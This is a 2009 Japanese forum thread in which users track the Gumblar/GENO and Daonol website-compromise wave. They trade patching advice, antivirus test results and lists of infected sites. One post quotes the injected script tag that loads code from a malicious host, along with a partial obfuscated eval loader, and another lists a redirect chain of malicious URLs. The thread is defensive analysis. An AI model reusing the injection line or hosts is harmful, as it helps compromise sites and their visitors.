397 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 16:43:00 ] >>394 えっじゃねえよ 頭使えよ
398 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 17:54:51 ] 頭使うもなにも 自動でアップデートとか初耳なんだが 設定しだいで出来るってことなのか?
399 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 18:24:49 ] 正確にはアップデート確認か 求めてることは同じだろ
400 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 18:32:16 ] Flashはアップデートの確認 Readerはアップデートまで自動でやってくれるね
401 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 19:00:56 ] そんなに自動が好きなのか
402 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 19:06:22 ] 何を言ってるんだ君は
403 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 19:24:01 ] Readerはたしか環境設定のアップデータの項目に 自動にするしないの選択項目があってわかりやすいよ ただしこれは最新版の場合ね それより前のバージョンだと、環境から一般いってそこに アップデートについての選択項目があったと思う
404 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 20:46:41 ] >>386 しかしJRAが感染してたのに騒ぎにもならないとは もう、みんな対策を済ませてたのか そんなはずはないな GENOウイルス自体に、もう関心がなくなってるのか
405 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 20:51:40 ] 前回の時も全然ニュースにならなかったよ。 分かり難い害だから話題にしにくいんじゃない?
406 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 20:56:08 ] ”みんな”はウイルス自体に関心がないからな・・・ 認知されるのはいつも通り被害が十分に行き渡ってからだろ
407 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 20:57:22 ] ヤフーに乗ったのもずいぶんたってからだったしな
408 名前:名無しさん@お腹いっぱい。 mailto:age [2009/10/22(木) 21:24:11 ] ひきこもり共和国という交流サイトがやられた模様。 love6.2ch.net/test/read.cgi/hikky/1221915065/827-
409 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 23:05:01 ] >>404 馬券買ってるおっさん世代はウイルスなんて知らんのじゃないか?
410 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 23:29:17 ] 馬券買うってことは金銭とか扱うだろうしJRA早いとこ対策しないとまずいんじゃ
411 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/23(金) 16:38:02 ] JRAまじかよーorz ノンスクリプト許容してるサイトなのにorz
412 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/23(金) 16:41:02 ] こんなとこ来るような人なら実害ないだろ
413 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/23(金) 16:55:48 ] >>411 JRA確認してないんでわからんけど、通常であれば 外部ドメインにしこまれてたはずだよ 全許可ならダメだけど見知らぬドメインは許可されてなかったんじゃないかな
414 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/23(金) 17:06:08 ] OSがvista以降なら問題ない
415 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/23(金) 17:11:43 ] ガンブラさんは今月で3つも確認 いずれも個人サイト
416 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/23(金) 17:44:54 ] JRAの潔い態度に感動したです GENOも、これくらい堂々としてたら…
417 名前:名無しさん@お腹いっぱい。 [2009/10/24(土) 02:41:16 ] 【セキュリティ】「GENO」に酷似したウイルスが流行の兆し、国内60サイトで感染確認(09/10/23) pc11.2ch.net/test/read.cgi/pcnews/1256299220/ GENOウイルスに類似したあらたな攻撃が発生 tsushima.2ch.net/test/read.cgi/news/1256287835/
418 名前:名無しさん@お腹いっぱい。 mailto:age [2009/10/24(土) 15:26:49 ]
419 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 18:15:02 ] ここに出入りしているのは、ちゃんとupdateしているような奴ばかりだから情報が集まらないな。 もっとレベルの低いところじゃないと。。
420 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 18:37:25 ] Gumblar類似のDaonolが広がってるみたい 全国でPCが起動しなくなるトラブルが多発。PC初心者の多い富士通サポセンがパンク状態 tsushima.2ch.net/test/read.cgi/news/1256308562/ 黒い画面にマウスカーソル (Win32/Daonol) blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
421 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 18:41:03 ] >>420 DaonolとGumbarの因果関係は現時点では不明というか 憶測の域じゃないのか
422 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 18:57:23 ] >>421 ウイルス名は各ベンダーが好き勝手に付けてるから。Daonol=Gumblar。 ttp://internet.watch.impress.co.jp/cda/special/2009/05/21/23523.html >なお、このウイルスは「Gumblar」という名称以外にも、 >Symantecでは「Infostealer.Daonol」、 >マイクロソフトでは「Win32/Daonol.F」、 >Kasperskyでは「Trojan-Dropper.Win32.Agent.apfn」といった名称が付けられている。
423 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 19:07:51 ] >>422 サンクス。ようやくわかった。 ていうか大昔にウイルスの名前をベンダー間で統一しようって言ってたんじゃないのかよ。。
424 名前:まとめ mailto:sage [2009/10/24(土) 19:51:00 ] Genoウイルス(Gumblar)再び ttp://slashdot.jp/submission/36590/GenoGumblar ■「Gumblar」酷似ウイルスが流行の兆し、国内60サイトで感染確認 ttp://internet.watch.impress.co.jp/docs/news/20091023_324076.html 黒い画面にマウスカーソル (Win32/Daonol) ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx JRAレーシングビュアーでサイト改ざん ウイルス感染の疑い(2009.10.21) ttp://www.weekenddream.jp/keiba_news/cat70/20091021_1.html 「Gumblar」の脅威再び―Kaspersky が警告 ttp://japan.internet.com/webtech/20091023/4.html Gumblar に酷似、新たな脅威発生に警告 ttp://www.kaspersky.co.jp/news?id=207578788 ウイルス・セキュリティ情報 | dynabook.com サポート情報 コンピュータウイルス「Torojan.Win32/Daonol.H」について ttp://dynabook.com/assistpc/info/20091022.htm コンピュータウイルス「Win32/Daonol」に関するご注意 ttp://supportapj.dell.com/support/topics/topic.aspx/jp/shared/support/news/2009/20091022?c=jp&l=ja&s=gen
425 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 23:47:55 ] ttp://cycle-world.jp/ ここも?
426 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 23:52:36 ] >>425 ぽいね
427 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 23:52:59 ] >>425 やられてるね あと、URLを書くときは“.”を“●”などに置き換えて
428 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/24(土) 23:58:21 ] スタッフブログの方は無事っぽ 普通に毎日更新で見てるっぽいし教えるべきかな?
429 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:00:25 ] がっつり逝ってる ワロス
430 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:09:23 ] 何のサイト? さすがに踏みたくない
431 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:11:26 ] 西日本最大級オートバイ用品専門店らすぃ
432 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:13:13 ] >>431 ありがとう
433 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:14:39 ] <script src=*****mages/index.php ></script> の部分がそうか? 繋がんないけど
434 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:16:44 ] サイトも店の色も派手なツートンなんでドンパチよろしいんじゃないんでしょーか
435 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:20:14 ] >>433 スクリプトだけ書いてあるページに飛ばされるっぽいが… ソースチェッカーで見たのでレイアウトは知らん スタッフブログ※欄に凸っていいのか? だが何を書いたらいいのかよくわからんので 詳しい人がやってくれるならお願いしたいが
436 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:21:34 ] >>433 接続2回目は拒否られるよね 調べ回避の手段っぽいわ
437 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:25:36 ] やっぱVistaだと無効なんだな もちろん7もだろうけど
438 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:33:03 ] >>428 24日土曜も更新してるね 余裕っすね
439 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:33:47 ] これはXPから7へ移行させようとするマイクロソフトの陰謀だったんだよ!!
440 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:34:56 ] ΩΩΩ<な(ry まぁ実際問題7がびす太ほどアレじゃなければ乗り換えようかと思ってるがな
441 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:37:41 ] vistaでもUAC切ってたらマズイんだよな? やかましいから切ってるけど
442 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:39:48 ] スタッフ写真無くて(´・ω・) ツマンナス
443 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 00:45:37 ] >>441 この件に関してはUACは関係ない もちろん有効にしておいた方がより安全だが
444 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 01:45:52 ] 結局だれも教えに行ってないのかバロス
445 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 01:52:26 ] 管理者様 急啓 ていへんだぁていへんだぁ おたくのサイトがていへんだぁ 顧客に毒盛り、ていへんへんだぁ かしこ FAX番号わかったけど(´・ω・) ツマンナス
446 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:08:07 ] ググるとHPのタイトル部分にスクリプトを埋め込まれたのがいっぱいヒットするな、もう無差別攻撃か・・・
447 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:08:34 ] p-frying ●com/ ここも感染してる ていうか前のGENO騒ぎの時から感染してるっぽい
448 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:10:06 ] .は●に変えたがh抜き忘れたorz
449 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:12:11 ] この攻撃ってAdobeが脆弱性発表したらすぐに蔓延したんだよな 発表しなかったらこんなことにならなかったかもな まあそう言うわけにもいかないのかも知れないが
450 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:29:19 ] >>446 なにでググってる? martuzあたり?
451 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 02:44:05 ] 木造で中古だと利回りがきつそうで(´・ω・) カワイソス
452 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 10:31:32 ] Avast!のWebシールドが最近の*.phpにも反応するようになった
453 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 11:29:45 ] 糞チェッカー バージョン指定書きで後で後悔するといったのにねえ さすがアフィ厨
454 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 13:25:50 ] >>425-427 <script src=hxxp://fotothhi.be/images/index.php ></script> .phpの中身 //<script> dLLdw=24;if(unescape)dLLdw='';jYCXE=unescape('%'+dLLdw); 〜中(難読化されてたから)略〜 eval(unescape(i0j.replace(/[IlN]/g,jYCXE))); //</script>
455 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 14:17:13 ] サイトはどうやって改ざんされてるんだ?
456 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 14:26:44 ] >>452 いろいろ試した感じだとIE6なら金曜くらいから拾ってそうな感じだった 他も拾うようになったのかな
457 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 14:27:38 ] >>455 FTP使って改ざんされてます サーバに攻撃とかそういうのじゃないです つーかこのへんは前と変わってないはず
458 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 14:52:05 ] >>456 同じサイトの検体でも日が違うと中身が変わって対応状況はバラバラ 今はAvast!とKasperskyの対応がよさそう 2/41 (4.88%) ttp://www.virustotal.com/jp/analisis/34330a5a110da2ed5f57ee54b7b8df05a8a8d7971e8d898b6f99fe6fb5e6442d-1256440050 5/41 (12.20%) ttp://www.virustotal.com/jp/analisis/39669ef4eabe7224ff262f678579542e39be15316f4125bd58b74c6c18fb472c-1256440598
459 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 16:39:07 ] 何となく思ったのだが 何気に Vista、Windows7 への移行を促そうとする 大人の事情が暗に蠢いていたりとかするのだろうか…
460 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 16:43:01 ] 7への移行とアンチウイルス2010年版への移行を促すための業界ぐるみのイベントだろ
461 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 17:56:34 ] >>458 日ごとどころかアクセスするたびにかわるわよ でも非IEでもAvastが対応してきたようだね
462 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:08:42 ] XPの脆さが改めて露呈しただけだろ
463 名前:名無しさん@お腹いっぱい。 [2009/10/25(日) 18:10:56 ] Flashのアップデートしてなくてアンチウイルス入れてないやつがたんまり 居るってことだな MSE普及の一環か
464 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:22:40 ] カスペでさっき遮断した 本当に困る
465 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:30:55 ] >>463 MSEはおろかノートンやバスターでブロックできんからこれだけ広まってるんだろ
466 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:34:44 ] >>463 Flash Playerだけじゃないよ
467 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 18:39:31 ] genolists.alink.uic.to/ 新種感染サイトのリストはここ使うの?
468 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 19:04:29 ] >>450 Google先生は、AS番号ごとにウイルス感染サイト(gumbler以外も含む)を教えてくれるよ。 例えば、 楽天(infoseek.co.jp、cool.ne.jp) safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:23820 Softbank(geocities.jp) safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:23816 とかね。 最近までgumblar/martuzに改竄されて放置されてたサイトは、 新型に改竄されてる可能性が高い。
469 名前:あげ [2009/10/25(日) 20:08:52 ] fileseek.jp/ (携帯専用) PCサイト閲覧Proxyのメニュー(*ボタン)からソースを見れるから 簡易チェッカーとして使えるかもしれん。 ※パケ定必須
470 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 22:05:38 ] >>465 ノートンは脆弱性を遮断する機能で防げるんじゃないだろうか
471 名前:名無しさん@お腹いっぱい。 [2009/10/25(日) 22:19:28 ] バスター最新にしても駄目?
472 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 22:43:57 ] >>471 それよりもAdobeのアップデートとWindowsアップデートしとけば問題ない
473 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 22:45:00 ] >>470 分かる範囲でいくつかのサイトに行ったがすべてその機能で遮断できる
474 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:10:28 ] アップデート全部したんだが、これで再起動しても平気かな?
475 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:14:00 ] ソフトの更新は予防のためにするものであって 感染後にやっても手遅れだよ
476 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:14:15 ] /(^o^)\
477 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:14:51 ] >>474 カスペのオンラインスキャンでウイルススキャンしてからのほうがいいよ
478 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:14:56 ] >>468 その2つのページだけで、日本国内のgumblar.x感染サイトが9つある。 ikebananonohana●hp●infoseek●co●jp pengzipk●hp●infoseek●co●jp seiya06●hp●infoseek●co●jp pee3●hp●infoseek●co●jp www●ski-srsc●com www●geocities●jp/fumisugi43/ www●geocities●jp/jr1ujx/ www●geocities●jp/tileaf05/ www●jpla-aichi●com こりゃ、国内60サイトどころじゃないでしょ。
479 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:15:55 ] >>477 現在メンテナンス中のため、ご利用いただけません。ご迷惑をおかけして申し訳ございません。 機能を強化した新しいバージョンのカスペルスキーオンラインスキャナが近日中にリリースされます。 また、個人向け総合セキュリティソフト「Kaspersky Internet Security 2010」の無料試用版 (有効期間:30日間) をダウンロードしてご利用いただけます。
480 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:17:51 ] ニフティもエンジンはカスペだからそっちでやればいいんじゃね
481 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/25(日) 23:18:41 ] >>474 ちなみに全部ってのは本当に全部やったの? たとえばFlash PlayerはIEとそれ以外じゃ別のものだよ
482 名前:473 mailto:sage [2009/10/25(日) 23:23:45 ] さらに色々調べたが ノートンはファイルの検査では検出しないけど ブラウザで読み込むと検出する サイトアドレスではなくファイルで検出するようだ この後バスター入れて試してみる
483 名前:473 mailto:sage [2009/10/26(月) 00:10:01 ] バスター入れてみたが試した範囲ではすべて遮断される ただデスクトップにおいたphpファイルは読み込める 2度目以降は無効になるような場合でも遮断される サイトアドレスで遮断してるように思えるがよく分からない
484 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 00:29:06 ] >>483 調査乙
485 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 00:48:20 ] >>483 激乙です! てことは大抵のアンチウイルスソフト入れてる人は 感染したサイト見ても、とりあえず感染は防げてるってことなのかな マカフィーはどうだろう
486 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 00:56:15 ] >>485 みたいのが一番危ないタイプだな
487 名前:473 mailto:sage [2009/10/26(月) 00:58:05 ] >>485 その前に試したPandaは読み込めちゃったね 違う段階で遮断できるかも知れないけど
488 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:05:20 ] >>486 アンチウイルスソフトやウインドウズアップデートは最新にしてたんだけど、 adobeは最新の一つ手前くらいのままだったからやっぱり感染したかな… >>487 そっかー 即レスありがとう
489 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:19:27 ] >>488 心配ならOSいれなおし
490 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:26:06 ] データのバックアップしても、入れ直したパソにそのデータ入れたら、再感染だよね? このウイルスはそんなことないとかないかorz
491 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:47:59 ] >>488 セコムに入っているから大丈夫!と鍵をかけずに外出したようなものだね モノに頼ってそれに過信してしまって 一番肝心なところである それを使う人間がセキュリティへの認識を忘れてしまっては どんなに優れたモノを使っていても意味をなさないよ
492 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:51:13 ] アップデートは最低でもこれくらいやらないとな Windows Update / Microsoft Update Adobe Flash Player 10.0.32.18 (IEと非IE両方) Adobe Reader 9.2 (導入済ならアップデート。ReaderのJavaScriptは切る) 上記は現段階の新型Daonol/Gumblarには必須 亜種でどうなるか分からないので下記も実施 Adobe Shockwave Player 11.5.1.601 (導入済ならIEと非IE両方。正直アンインストールでいい) Java 6 Update 16 (旧バージョンはすべてアンインストール) あとはQuickTimeとRealPlayerあたりか 使わないものはアンインストールだな
493 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 01:53:31 ] >>490 確実に大丈夫とはいえない
494 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:00:49 ] 今回Adobeのいつ頃のき弱性をついたものなのかもう分かってるの?
495 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:04:00 ] もうFlashなんかやめてSilverlightを採用すればいいのに
496 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:05:06 ] Windows Updateぐらい自動更新の設定にしとこうよ というかMSがWindows Updateの対象にAdobe ReaderとFlash入れるだけでいいのに
497 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:05:44 ] 「ぜいじゃく」って読むんだよ、ぼうや
498 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:08:04 ] きじゃくてwww 言語弱者もいいとこwww
499 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:08:49 ] 釣られんなよw
500 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:11:04 ] 後釣り宣言カコワルイ
501 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:13:52 ] 生酒でも飲んでまったりやろうや
502 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:18:19 ] この時間から酒飲むと朝つらいからお断りします
503 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:23:56 ] >>494 特定の脆弱性だけじゃなく複数利用してる Adobe製品だけじゃなくMicrosoftのもあった いろいろな組み合わせみたいなんで確実にこれだけふさげばいいってものはないよ
504 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 02:37:29 ] 【中卒の為の国語辞典】 脆弱性 【ぜいじゃくせい】 脆【もろ】く、傷つきやすいこと。攻撃に対して弱いこと。
505 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:02:18 ] 前のGENOの時はメールとかお気に入りとか、そういうファイルデータにつく ウイルスじゃないから、感染してからバックアップとっても 平気とかどこかで見た気がする。 もちろんデータをクリーンインストールしてから戻すときは 当然ウイルスチェックしてからということだったけど。
506 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:05:13 ] ぜいじゃく性ですね すみません 本当に恥ずかしい間違いでした 教えてくれてありがとうございます
507 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:15:35 ] 本当の読み方はぜいじゃくしょう ただ、最初に用語辞典に載った時にぜいじゃくせいとルビを振られたから今の読みになった 豆知識
508 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:39:39 ] >>507 恥ずかしい限りですが勉強になります やっぱりアップデートとかをこまめにするのが一番ですが 今回のは駆除はカスペができるようなので、カスペで無事検出駆除できた人は OS再インスコしなくて良さそう?なのかな?
509 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:41:22 ] カスペで駆除できたって報告あるか?
510 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:50:26 ] ありますんね・・・
511 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:52:09 ] カスペ自らが宣言してるけどどこまで対応してるのかわからん www.kaspersky.co.jp/news?id=207578788
512 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 03:52:29 ] 試しに感染してみるか 古いアドビのソフトがあれば
513 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 04:03:41 ] 無駄無駄 アンチウィルスソフトに過剰な期待を抱かないほうがいい 日々、腐るほど亜種が湧いてるからな
514 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 04:07:04 ] そのうちvistaや7も感染対象になるのかね
515 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 04:07:25 ] カスペもオンラインスキャナをメンテ中とか鬼だよな。
516 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 07:11:48 ] Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」 www.forest.impress.co.jp/docs/review/20091020_323014.html hide9999.web.fc2.com/
517 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 07:13:03 ] 既出 もともと自動
518 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 07:14:02 ] 無料駆除ツールでてますか? カスペ体験版入れるしかないのか・・・
519 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 07:23:46 ] 体験版じゃなくて製品版買えばいいだろ
520 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 11:45:48 ] HD買ってきてOSインストールして 外したHDを外付けにしてバスター2010でウイルススキャン トロイ式なんとかかんとか と出て隔離に成功 なんでも最新がいいんだなと思って IEは6から8へ バスターも06から10へ 正直新しいPC買ったみたいです(^O^)
521 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 14:46:01 ] >>420 富士通よりシェアがデカいNEC(1位NEC 2位富士通)も当然パンク、 富士通にならってリリース出しました。 【お詫び】電話お問い合わせ窓口の混雑について ttp://121ware.com/navigate/support/121cc/info/20091026/ 東芝 ttp://dynabook.com/assistpc/info/20091022.htm SONY ttp://search.vaio.sony.co.jp/solution/S0910211068384/ DELL ttp://supportapj.dell.com/support/topics/topic.aspx/jp/shared/support/news/2009/20091022
522 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 15:09:12 ] >>521 一昨日だっけか?東芝のサポートって類似の質問はないとか言って蹴ってなかったか?
523 名前:名無しさん@お腹いっぱい。 [2009/10/26(月) 15:32:57 ] >>508 前回のも普通に駆除できるから 無知が作ったウィキなんて信用するなよ
524 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 16:20:54 ] SonyはVistaも対象に含めているのか
525 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:01:40 ] なんだろこれ・・・ www■idealgroup-24■com/ → theflyingpoodles■com/images/DSC_0035■php → chezmichel■nl/images/index3■php → bellsworld■com/new_submissions/verhor1■php → psunrise■cn/images-d/index2■php (アクセス拒否) 最後のアクセス拒否以外の中身が妙な404で AguseGatewayで見ると//404 ソース見るといずれも // iframes are EVIL! Hate Zeus! というメッセージ付き
526 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:13:14 ] なんで
527 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:13:54 ] 途中送信orz なんでabout:blank開いてんだこれ 本当に404なら分かるけど
528 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:18:49 ] >>524 でもソニーはウイルス名の指定がないな。 とにかくリカバリしやがれ(意訳)の一点張り。あんまりあてにできないのでは。
529 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:23:58 ] Zeusっつーとこれかな ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091007/338476/
530 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 20:25:43 ] Gumblar再襲来(3) Adobe Reader/Flash/IE/Office、攻撃は最新版でブロック ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2045 25日時点でカスペルスキーが「Trojan-Downloader.JS.Gumblar.x」の検出名で全件を、 Avastが「JS:Downloader-FA」または「JS:Downloader-FC」で全件を検出。 G Dataが「JS:Downloader-EZ」で13件を検出した。 ちなみに前日に行った3件の事前調査では、カスペルスキー以外は全滅だった。
531 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 21:06:13 ] japan.internet.com/webtech/20091010/12.html >Adobe の勧告には、次のような記述がある。 >「『Windows Vista』上で DEP (データ実行防止) 機能を有効化している >Adobe Reader および Acrobat 9.1.3 のユーザーは、この攻撃の影響を受けない。 10/13のAcrobatの脆弱性ですが VISTAでもDEPが無効だと駄目だったようですね。 VISTAがプレインストールされているPCだと CPUがDEPにまず対応している気がしますが・・・
532 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 21:44:06 ] XPでハードウェアDEPが有効かつ IE8のメモリ保護が有効だった場合はどうなんでしょうね・・・ VISTAと同様の結果になるのか、違うのか・・・
533 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 23:17:04 ] ソフト使わなくても、FlashPlayerとAdobeReaderを自動でアップデートできるって 上のほうで言われてるから調べてみた。 ■FlashPlayer www.adobe.com/jp/support/kb/ts/228/ts_228473_ja-jp.html ■AdobeReader(9.20は編集>環境設定>アップデーターでできた) www.geocities.jp/fssreport/update/article003/index.html >Flash Player の自動更新のチェックはバックグラウンドでの動作ではなく、 >ブラウザ上で Flash コンテンツを読み込んで Flash Player が起動した際に実行されます。 FlashPlayerだけでなく、AdobeReaderも同じだと思うんだけど、起動した際にアップデートって、 ウィルスつきのファイルを開く直前に最新版になれるって解釈していいんだろうか。
534 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 23:32:53 ] Flash_Reader_Updateはアップデート作業を「半自動化できる」ソフト 自動でアップデートするものでは無いから大差ない
535 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 23:53:50 ] >>533 いつも主導で更新しちゃってるから自動のチェックタイミングわからないんだけど アプリ起動時のチェックだとしたら最新版になる前に攻撃くらうだろうね
536 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/26(月) 23:54:31 ] 主導→手動でしたごめん
537 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 00:13:54 ] Adobe ReaderとAdobe Flash Playerはいつアップデートあるのかわからない アップデートは手動、Adobeのサイト言ってチェックしないといけない
538 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 00:22:16 ] 過去の更新状況から考えると 更新があった場合はコンテンツが表示されたあとで 更新のダイアログが表示されていたはずだから >>533 の場合は既に攻撃を喰らったあとだろう
539 名前:533 mailto:sage [2009/10/27(火) 00:47:38 ] レスくれたひとありがとう。 Flash_Reader_Updateは半自動化しかしてくれなくても、 インターネット前に必ずアップデートするとか、 >>387 の記事のように、タスクスケジューラ使うようにすれば、 >>533 みたく『起動してから』じゃなくて、『事前に』最新版にできるんだよね。 ソフトDLすることにするわ。 記事みて検索してはじめて、タスクスケジューラを知った初心者だけどw
